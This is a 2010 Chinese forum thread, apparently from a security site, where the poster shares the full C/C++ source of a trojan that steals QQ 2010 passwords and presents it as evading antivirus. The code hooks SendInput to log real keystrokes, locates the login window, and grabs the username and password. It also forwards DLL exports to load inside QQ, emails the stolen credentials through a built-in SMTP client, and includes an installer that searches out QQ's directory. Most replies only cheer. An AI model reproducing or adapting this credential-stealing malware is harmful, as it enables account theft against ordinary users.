首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 付费问答
    3. 发新帖
[旧帖] [原创]刚写完的QQ2010木马源码,绝对免杀(以加上讲解) 0.00雪花
发表于: 2010-11-1 17:45 12490

[旧帖] [原创]刚写完的QQ2010木马源码,绝对免杀(以加上讲解) 0.00雪花

hmxiaowu 活跃值
2010-11-1 17:45
12490
.

回复的人多,我就发全部源码!

代码已经全部贴上,请往下看

代码没给大家 讲解,不知道看懂没。
所以,现在我原理给大家说一下,腾讯QQ 安装了两个钩子一个是WH_DEBUG,还有一个是WH_KEYBOARD_LL,当QQ的密码框获得焦点的时候DEBUG钩子就开始用SendInput发送乱码,在QQ启动的时候也会先调用SendInput发送一个乱码,所以就挂钩SendInput 这个函数,我们正确安装按键的时候QQ会通过WH_KERBOARD_LL低级钩子,发送一个错误的按键信息,在这里通过分析,发现在WIN7系统上 真实的按键的就在0x12faa0处记录着,挂钩之后判断一下来源,if(nRetAddress!=0x74F3&&nRetAddress!=0x7374) ,就排除不是真实按键调用的,当然上面这句我们是WIn7上的地址,所有有朋友说,在XP上不行,由于我是WIN7的系统,还没装XP的虚拟机,所以并没添加这个判断,传进来的pInputs等我们基本上就不用去管他,然后通过if(pInputs->ki.dwFlags==0)
判断是否是键盘按下,如果是按下,我们就开始记录。
DWORD nRetAddress=0;
        _asm
        {
                mov eax,0
                mov ax,[ebp+4]
                mov nRetAddress,eax
        }
if(nRetAddress!=0x74F3&&nRetAddress!=0x7374)
这就是取得是什么地方在调用SendInput.
char key=0;
                _asm
                {
                        mov ebx,0x12faa0
                        mov eax,0
                        mov al,[ebx]
                        mov key,al
                }
获取真实的按键,稍后我换上XP系统后,会将这个几个关键西方的发出,大家就可以在XP上也能使用这个木马了。

有人会问为什么我 的文件是User32Hook.cpp 实际挂钩的是SendInput,这个是因为,我用OD分析的时候发现在User32.dll中有一个固定地址 通过[ebp+c]之后也可以获取到 键盘按下的真实按键信息,只要挂钩在那里,也是可以获得真确的按键信息,然后写出木马,并且可以早于QQ的WH_KEYBOARD_LL钩子获取真实按键,就算QQ在WH_KEYBOARD_LL把 WIN7下地址为0x12faa0的真实按键信息清0,也是没有用的,兴趣的朋友,就在 WH_KEYBOARD_LL上下段,然后往上跟就会看到了。只是这样挂钩USER32.dll的时候光写这个DLL了,就得去修改QQ.EXE文件,修改QQEXE后,他有个自身文件的验证,可以通过修改输入表,替换掉CreateFileW 改变打开的文件,而绕过他的文件验证保护,在首地址写入,加载DLL的代码,立马挂钩USER32.DLL,然后恢复QQ的OEP地址的内存,从新回到QQ的OEP,这样就可以在QQ输入密码的时候早于QQ获得,也不用在挂钩SendInput,后来我发现WH_KEYBOARD_LL钩子中当真实的按键按下时,他也会去调用SendInput虽然是错的按键,但是我们可以通过0x12faa0获得真实的按键,所以我就改写了,代码,这样看起来更简单。其他的我就不多说,有兴趣的朋友,在分析把!

代码在后面,我会陆续全部贴上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
#include <windows.h>
#include <stdio.h>
#include <WinAble.h>
 
#pragma comment(lib,"User32.lib")
#include "User32Hook.h"
 
char g_Password[100]={0};
int g_KeyIndex=0;
BYTE g_OldFunc[8];
BYTE g_NewFunc[8];
FARPROC g_lpHookFunc;
 
BYTE g_NewFunc2[8]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
DWORD g_lpHookFunc2;
 
 
char asciiKey1[]={
    '~','1','2','3','4','5','6','7','8','9','0','-','=',
    'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
    '[',']','\\',';','\'',',','.','/',
    '0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
char asciiKey2[]={
    '~','1','2','3','4','5','6','7','8','9','0','-','=',
    'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
    '[',']','\\',';','\'',',','.','/',
    '0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
unsigned int asciiTbl[]={
    0xFFFFFFC0,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0xFFFFFFBD,0xFFFFFFBB,
    0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,
    0xFFFFFFDB,0xFFFFFFDD,0xFFFFFFDC,0xFFFFFFBA,0xFFFFFFDE,0xFFFFFFBC,0xFFFFFFBE,0xFFFFFFBF,
    0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6D,0x6E,0x6F
};
 
 
UINT WINAPI XwSendInput(UINT nInputs,LPINPUT pInputs,int cbSize)
{
    DWORD nRetAddress=0;
    _asm
    {
        mov eax,0
        mov ax,[ebp+4]
        mov nRetAddress,eax
    }
    UINT nRet=0;
    HookOff();
    nRet=SendInput(nInputs,pInputs,cbSize);
    HookOn();
 
    if(nRetAddress!=0x74F3&&nRetAddress!=0x7374)
    {
        char key=0;
        _asm
        {
            mov ebx,0x12faa0
            mov eax,0
            mov al,[ebx]
            mov key,al
        }
        POINT point;
        ::GetCaretPos(&point);
        int postion=point.x/8;
     
        if(pInputs->ki.dwFlags==0)
        {
            for(int i=0;i<63;i++)
            {
                if(GetKeyState(VK_NUMLOCK)==0&&i>(63-15))
                    break;
                if(asciiTbl[i]==key)
                {
                    if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)!=0)||GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)==0)
                    {
                        if(postion<g_KeyIndex)
                        {
                            for(int k=g_KeyIndex;k>=postion;k--)
                            {
                                g_Password[k+1]=g_Password[k];
                            }
                            g_Password[postion]=asciiKey1[i];
                            g_KeyIndex++;
                        }
                        else
                            g_Password[g_KeyIndex++]=asciiKey1[i];
                    }
                    if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)==0)||(GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)!=0))
                    {
                        if(postion<g_KeyIndex)
                        {
                            for(int k=g_KeyIndex;k>=postion;k--)
                            {
                                g_Password[k+1]=g_Password[k];
                            }
                            g_Password[postion]=asciiKey2[i];
                            g_KeyIndex++;
                        }
                        else
                            g_Password[g_KeyIndex++]=asciiKey2[i];
                    }
                }
            }
            if(key==0x8)
            {
                if(g_KeyIndex>0)
                {
                    g_Password[g_KeyIndex]=0;
                    g_Password[--g_KeyIndex]=0;
                }
            }
        }
    }
    return nRet;
}
 
void InitHookCallBack()
{
    g_lpHookFunc=GetProcAddress(GetModuleHandle("user32.dll"),"SendInput");
    g_NewFunc[0]=0xe9;
 
    memcpy(g_OldFunc,(char*)g_lpHookFunc,5);
    DWORD *pNewFuncAddress=(DWORD*)&g_NewFunc[1];
 
    *pNewFuncAddress=(DWORD)((FARPROC)XwSendInput)-((DWORD)g_lpHookFunc)-5;
}
 
void HookOn()
{
    DWORD dwOleFlag;
    WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_NewFunc,5,&dwOleFlag);
}
 
void HookOff()
{
    DWORD dwNewFlag;
    WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_OldFunc,5,&dwNewFlag);
}


程序在附件中

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费
支持
分享
最新回复 (146)
hoyer
雪    币: 3493
活跃值: (261)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
2
贴源码瞅瞅吧。
2010-11-1 18:25
0
prober
雪    币: 35
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
鼎……
2010-11-1 18:26
0
binarystar
雪    币: 251
活跃值: (77)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
私信
4
看到红头文字。。先不管三七二十一来回复一下。。开源是好事。。顶!!!!!!!
2010-11-1 18:27
0
azilljy
雪    币: 20
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
谢谢LZ分享,向LZ学习
2010-11-1 19:03
0
何厚铧
雪    币: 12
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
这个太厉害啦。
2010-11-1 19:30
0
pqqop
雪    币: 21
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
............不懂,顶一个!
2010-11-1 19:34
0
hackroad
雪    币: 5053
活跃值: (4263)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
这个太厉害啦....
2010-11-1 19:35
0
odile
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
支持原创。。。顶
2010-11-1 20:08
0
枫叶飘
雪    币: 37
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
这个需要顶!
2010-11-1 20:18
0
邹志勇
雪    币: 196
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
11
看看代码的质量如何~
2010-11-1 20:27
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
12
.

回复的人,我就慢慢,把全部代码贴完

  木马dll函数的 main.cpp文件的代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#include <Windows.h>
#include <stdio.h>
#include "User32Hook.h"
#include "SendMail.h"
 
#pragma comment(linker,"/export:DllCanUnloadNow=Command.DllCanUnloadNow")
#pragma comment(linker,"/export:DllGetClassObject=Command.DllGetClassObject")
#pragma comment(linker,"/export:DllMain=Command.DllMain")
#pragma comment(linker,"/export:DllRegisterServer=Command.DllRegisterServer")
#pragma comment(linker,"/export:DllUnregisterServer=Command.DllUnregisterServer")
 
HWND hLoginWindow,hUserName,hUserPwd;
char g_UserName[100]={0};
char g_Version[100]={0};
 
void WaitLoginWindow()
{
    Sleep(1500);
    while(true)
    {
        hLoginWindow=GetForegroundWindow();
        POINT pni;
        RECT rcWindow;
 
        GetWindowRect(hLoginWindow,&rcWindow);
 
        pni.y=rcWindow.top+115;
        pni.x=rcWindow.left+100;
        hUserName=WindowFromPoint(pni);
 
        pni.y=rcWindow.top+155;
        pni.x=rcWindow.left+100;
        hUserPwd=WindowFromPoint(pni);
 
        LONG lStyle = ::GetWindowLong(hUserPwd, GWL_STYLE);
        if(lStyle & ES_PASSWORD)
            break;
 
        Sleep(100);
    }
}
 
DWORD WINAPI ServerThreadProc(LPVOID lpParameter)
{
    memset(g_Password,0,100);
    WaitLoginWindow();
    SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)g_UserName);
    SendMessage(hLoginWindow,WM_GETTEXT,100,(LPARAM)g_Version);
 
    while(true)
    {
        char tempAccounts[100];
        ::SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)tempAccounts);
        if(strcmp(g_UserName,tempAccounts)!=0&&strlen(tempAccounts)!=0)
            strcpy(g_UserName,tempAccounts);
 
        LONG lStyle = ::GetWindowLong(hUserPwd, GWL_STYLE);
        if((lStyle & ES_PASSWORD)==0)
            break;
        Sleep(100);
    }
 
    char szContext[64]={0};
    sprintf(szContext,"QQ版本:%s\r\n用户名:%s\r\n密  码:%s\r\n",g_Version,g_UserName,g_Password);
 
    SMTPINFO smtpinfo;
    strcpy(smtpinfo.SmtpSrvName,"AAAAAAAAAAAAAAAAAAAA");
    strcpy(smtpinfo.Port,"25");
    strcpy(smtpinfo.UserName,"BBBBBBBBBBBBBBBBBBBB");
    strcpy(smtpinfo.Password,"CCCCCCCCCCCCCCCCCCCC");
    strcpy(smtpinfo.From,"DDDDDDDDDDDDDDDDDDDD");
    strcpy(smtpinfo.To,"EEEEEEEEEEEEEEEEEEEE");
    strcpy(smtpinfo.Subject,"*☆‰小五※*提醒-获取到新的QQ!");
    strcpy(smtpinfo.Msg,szContext);
 
    SendMail(&smtpinfo);
 
    return 0;
}
 
BOOL WINAPI DllMain(__in void * _HDllHandle, __in unsigned _Reason, __in_opt void * _Reserved)
{
    switch(_Reason)
    {
        case DLL_PROCESS_ATTACH:
            InitHookCallBack();
            HookOn();
            CreateThread(NULL,0,ServerThreadProc,0,0,0);
            break;
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    return 0;
}
2010-11-1 20:35
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
13
User32Hook.h 文件的代码

1
2
3
4
5
void HookOff();
void HookOn();
void InitHookCallBack();
 
extern char g_Password[100];
2010-11-1 20:43
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
14
SendMail.h文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
typedef struct _SMTPINFO
{
    char SmtpSrvName[32];
    char Port[7];
    char UserName[16];
    char Password[16];
    char From[32];
    char To[32];
    char Subject[32];
    char Msg[64];
}SMTPINFO;
 
//将用户名和密码转换为base64编码
void Base64(unsigned char *chasc,unsigned char *chuue);
int Talk(SOCKET sockid, const char *OkCode, char *pSend);
int SendMail(const SMTPINFO *psmtpinfo);
2010-11-1 20:44
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
15
SendMail.cpp文件中的代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
#include <winsock2.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "SendMail.h"
 
#pragma comment(lib,"ws2_32.lib")
 
const int buflen = 256;
char buf[buflen];
int i,userlen,passlen;
 
 
//---------------------------------------------------------------------
int SendMail(const SMTPINFO *psmtpinfo)
{
    //准备网络连接
    WSADATA wsadata;
 
    if (WSAStartup(MAKEWORD(2,2),&wsadata) != 0)
    {
        return 1;
    }
 
    //创建套接字
    SOCKET sockid;
 
    if ((sockid = socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
    {
        WSACleanup();
        return 1;
    }
 
    //得到smtp服务器ip
    struct hostent *phostent = gethostbyname(psmtpinfo->SmtpSrvName);
    struct sockaddr_in addr;
 
    CopyMemory(&addr.sin_addr.S_un.S_addr,
    phostent->h_addr_list[0],
    sizeof(addr.sin_addr.S_un.S_addr));
 
    addr.sin_family = AF_INET;
    addr.sin_port = htons(atoi(psmtpinfo->Port));
    ZeroMemory(&addr.sin_zero, 8);
 
    //连接服务器
    if (connect(sockid, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == SOCKET_ERROR)
    {
        goto STOP;
    }
 
    if (Talk(sockid, "220", "EHLO sjdf"))
    {
        goto STOP;
    }
 
    if (Talk(sockid, "250", "AUTH LOGIN"))
    {
        goto STOP;
    }
 
 
    ZeroMemory(buf, buflen);
 
    userlen = lstrlen(psmtpinfo->UserName);
    passlen = lstrlen(psmtpinfo->Password);
 
    for(i = 0; i < (userlen%3?userlen/3+1:userlen/3); i++)
    {
        Base64((unsigned char * )(psmtpinfo->UserName + i * 3),(unsigned char * )( buf + i * 4));
    }
 
    if (Talk(sockid, "334", buf))
    {
        goto STOP;
    }
 
    ZeroMemory(buf, buflen);
 
    for(i = 0; i < (passlen%3?passlen/3+1:passlen/3); i++)
    {
        Base64((unsigned char *)(psmtpinfo->Password + i * 3),(unsigned char * ) (buf + i * 4));
    }
 
    if (Talk(sockid, "334", buf))
    {
        goto STOP;
    }
 
    ZeroMemory(buf, buflen);
    wsprintf(buf, "MAIL FROM:<%s>", psmtpinfo->From);
 
    if (Talk(sockid, "235", buf))
    {
        goto STOP;
    }
 
    ZeroMemory(buf, buflen);
    wsprintf(buf, "RCPT TO:<%s>", psmtpinfo->To);
 
    if (Talk(sockid, "250", buf))
    {
        goto STOP;
    }
 
    if (Talk(sockid, "250", "DATA"))
    {
        goto STOP;
    }
 
    ZeroMemory(buf, buflen);
    wsprintf(buf, "TO: %s\r\nFROM: %s\r\nSUBJECT: %s\r\n\r\n%s\r\n.",
        psmtpinfo->To,psmtpinfo->From,psmtpinfo->Subject,psmtpinfo->Msg);
    if (Talk(sockid, "354", buf))
    {
        goto STOP;
    }
 
    if (Talk(sockid, "250", "QUIT"))
    {
        goto STOP;
    }
 
    if (Talk(sockid, "221", ""))
    {
        goto STOP;
    }
    else
    {
        closesocket(sockid);
        WSACleanup();
        return 0;
    }
 
STOP:
    closesocket(sockid);
    WSACleanup();
    return 1;
}
//---------------------------------------------------------------------
int Talk(SOCKET sockid, const char *OkCode, char *pSend)
{
    const int buflen = 256;
    char buf[buflen];
    ZeroMemory(buf, buflen);
 
    //接收返回信息
    if (recv(sockid, buf, buflen, 0) == SOCKET_ERROR)
    {
        return 1;
    }
    if (strstr(buf, OkCode) == NULL)
    {
        return 1;
    }
 
    //发送命令
    if (lstrlen(pSend))
    {
        ZeroMemory(buf, buflen);
        wsprintf(buf, "%s\r\n", pSend);
 
        typedef int (*MySend)(SOCKET,const char*,int,int);
         
        HMODULE hModule=LoadLibrary("Ws2_32.dll");
        MySend mySend=(MySend)GetProcAddress(hModule,"send");
 
        WSABUF DataBuf;
        DataBuf.len=lstrlen(buf);
        DataBuf.buf=buf;
 
        DWORD dwS;
        if(WSASend(sockid,&DataBuf,1,&dwS,0,0,0))
        //if (mySend(sockid, buf, lstrlen(buf), 0) == SOCKET_ERROR)
        {
            return 1;
        }
    }
 
    return 0;
}
//---------------------------------------------------------------------
//Base64编码,chasc:未编码的二进制代码,chuue:编码过的Base64代码
//将用户名和密码转换为base64编码
void Base64(unsigned char *chasc,unsigned char *chuue)
{
    int i,k=2;
    unsigned char t = 0;
 
    for(i=0;i<3;i++)
    {
 
        *(chuue+i)=*(chasc+i)>>k;
        *(chuue+i)|=t;
        t=*(chasc+i)<<(8-k);
        t>>=2;
        k+=2;
    }
 
    *(chuue+3)=*(chasc+2)&63;
 
    for(i=0;i<4;i++)
 
        if((*(chuue+i)>=0)&&(*(chuue+i)<=25)) *(chuue+i)+=65;
 
        else if((*(chuue+i)>=26)&&(*(chuue+i)<=51)) *(chuue+i)+=71;
 
        else if((*(chuue+i)>=52)&&(*(chuue+i)<=61)) *(chuue+i)-=4;
 
        else if(*(chuue+i)==62) *(chuue+i)=43;
 
        else if(*(chuue+i)==63) *(chuue+i)=47;
}
2010-11-1 20:44
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
16
.

User32Hook.cpp 文件的代码,这里便是怎么获取到QQ密码的地方.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
#include <windows.h>
#include <stdio.h>
#include <WinAble.h>
 
#pragma comment(lib,"User32.lib")
#include "User32Hook.h"
 
char g_Password[100]={0};
int g_KeyIndex=0;
BYTE g_OldFunc[8];
BYTE g_NewFunc[8];
FARPROC g_lpHookFunc;
 
BYTE g_NewFunc2[8]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
DWORD g_lpHookFunc2;
 
 
char asciiKey1[]={
    '~','1','2','3','4','5','6','7','8','9','0','-','=',
    'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
    '[',']','\\',';','\'',',','.','/',
    '0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
char asciiKey2[]={
    '~','1','2','3','4','5','6','7','8','9','0','-','=',
    'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
    '[',']','\\',';','\'',',','.','/',
    '0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
unsigned int asciiTbl[]={
    0xFFFFFFC0,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0xFFFFFFBD,0xFFFFFFBB,
    0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,
    0xFFFFFFDB,0xFFFFFFDD,0xFFFFFFDC,0xFFFFFFBA,0xFFFFFFDE,0xFFFFFFBC,0xFFFFFFBE,0xFFFFFFBF,
    0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6D,0x6E,0x6F
};
 
 
UINT WINAPI XwSendInput(UINT nInputs,LPINPUT pInputs,int cbSize)
{
    DWORD nRetAddress=0;
    _asm
    {
        mov eax,0
        mov ax,[ebp+4]
        mov nRetAddress,eax
    }
    UINT nRet=0;
    HookOff();
    nRet=SendInput(nInputs,pInputs,cbSize);
    HookOn();
 
    if(nRetAddress!=0x74F3&&nRetAddress!=0x7374)
    {
        char key=0;
        _asm
        {
            mov ebx,0x12faa0
            mov eax,0
            mov al,[ebx]
            mov key,al
        }
        POINT point;
        ::GetCaretPos(&point);
        int postion=point.x/8;
     
        if(pInputs->ki.dwFlags==0)
        {
            for(int i=0;i<63;i++)
            {
                if(GetKeyState(VK_NUMLOCK)==0&&i>(63-15))
                    break;
                if(asciiTbl[i]==key)
                {
                    if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)!=0)||GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)==0)
                    {
                        if(postion<g_KeyIndex)
                        {
                            for(int k=g_KeyIndex;k>=postion;k--)
                            {
                                g_Password[k+1]=g_Password[k];
                            }
                            g_Password[postion]=asciiKey1[i];
                            g_KeyIndex++;
                        }
                        else
                            g_Password[g_KeyIndex++]=asciiKey1[i];
                    }
                    if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)==0)||(GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)!=0))
                    {
                        if(postion<g_KeyIndex)
                        {
                            for(int k=g_KeyIndex;k>=postion;k--)
                            {
                                g_Password[k+1]=g_Password[k];
                            }
                            g_Password[postion]=asciiKey2[i];
                            g_KeyIndex++;
                        }
                        else
                            g_Password[g_KeyIndex++]=asciiKey2[i];
                    }
                }
            }
            if(key==0x8)
            {
                if(g_KeyIndex>0)
                {
                    g_Password[g_KeyIndex]=0;
                    g_Password[--g_KeyIndex]=0;
                }
            }
        }
    }
    return nRet;
}
 
void InitHookCallBack()
{
    g_lpHookFunc=GetProcAddress(GetModuleHandle("user32.dll"),"SendInput");
    g_NewFunc[0]=0xe9;
 
    memcpy(g_OldFunc,(char*)g_lpHookFunc,5);
    DWORD *pNewFuncAddress=(DWORD*)&g_NewFunc[1];
 
    *pNewFuncAddress=(DWORD)((FARPROC)XwSendInput)-((DWORD)g_lpHookFunc)-5;
}
 
void HookOn()
{
    DWORD dwOleFlag;
    WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_NewFunc,5,&dwOleFlag);
}
 
void HookOff()
{
    DWORD dwNewFlag;
    WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_OldFunc,5,&dwNewFlag);
}
2010-11-1 20:46
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
17
用来安装DLL文件的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
#include <windows.h>
#include <stdio.h>
#include <Shlwapi.h>
#pragma comment(lib,"Shlwapi.lib")
#include <Tlhelp32.h>
#include <WinAble.h>
 
#include "resource.h"
 
char g_data1[100]="aaaaaaaaaaaaaaaaaaaa";
char g_data2[100]="bbbbbbbbbbbbbbbbbbbb";
char g_data3[100]="cccccccccccccccccccc";
char g_data4[100]="dddddddddddddddddddd";
char g_data5[100]="eeeeeeeeeeeeeeeeeeee";
 
CHAR szPath[1024]={0};
DWORD dwIsQQ=0;
 
int GetQQPath(LPSTR lpPath)
{
    if(PathIsDirectory("C:\\Program Files\\Tencent\\QQ\\Bin"))
    {
        strcpy(szPath,"C:\\Program Files\\Tencent\\QQ\\Bin\\");
        dwIsQQ=1;
        return true;
    }
    else if(PathIsDirectory("D:\\Program Files\\Tencent\\QQ\\Bin"))
    {
        strcpy(szPath,"D:\\Program Files\\Tencent\\QQ\\Bin\\");
        dwIsQQ=1;
        return true;
    }
    else if(PathIsDirectory("E:\\Program Files\\Tencent\\QQ\\Bin"))
    {
        strcpy(szPath,"E:\\Program Files\\Tencent\\QQ\\Bin\\");
        dwIsQQ=1;
        return true;
    }
    else if(PathIsDirectory("F:\\Program Files\\Tencent\\QQ\\Bin"))
    {
        strcpy(szPath,"F:\\Program Files\\Tencent\\QQ\\Bin\\");
        dwIsQQ=1;
        return true;
    }
    WIN32_FIND_DATA FindFileData;
    HANDLE hFind;
    CHAR szDir[512];
    strcpy(szDir,lpPath);
    if(szDir[strlen(szDir)-1]!='\\')
        strcat(szDir,"\\");
    strcat(szDir,"*.*");
    hFind = ::FindFirstFile(szDir, &FindFileData);
    if(hFind==INVALID_HANDLE_VALUE)
        return 0;
    do
    {
        if(FindFileData.dwFileAttributes>=16&&FindFileData.dwFileAttributes<=22)
        {
            if(FindFileData.cFileName[0]!='.'&&stricmp("Windows",FindFileData.cFileName)!=0)
            {
                strcpy(szDir,lpPath);
                if(szDir[strlen(szDir)-1]!='\\')
                    strcat(szDir,"\\");
                strcat(szDir,FindFileData.cFileName);
                GetQQPath(szDir);
            }
        }
        else if(stricmp("QQ.exe",FindFileData.cFileName)==0)
        {
 
            if(lpPath[strlen(lpPath)-1]!='\\')
                strcat(lpPath,"\\");
            strcpy(szPath,lpPath);
            dwIsQQ=1;
            return 1;
        }
    } while (::FindNextFileA(hFind,&FindFileData));
    return 0;
}
 
void WriteData(HANDLE hFile)
{
    LONG dwAddress=0;
    DWORD dwWrite;
 
    dwAddress=0x177C;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data1,20,&dwWrite,NULL);
 
    dwAddress=0x1798;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data2,20,&dwWrite,NULL);
 
    dwAddress=0x17B0;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data3,20,&dwWrite,NULL);
 
    dwAddress=0x17C8;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data4,20,&dwWrite,NULL);
 
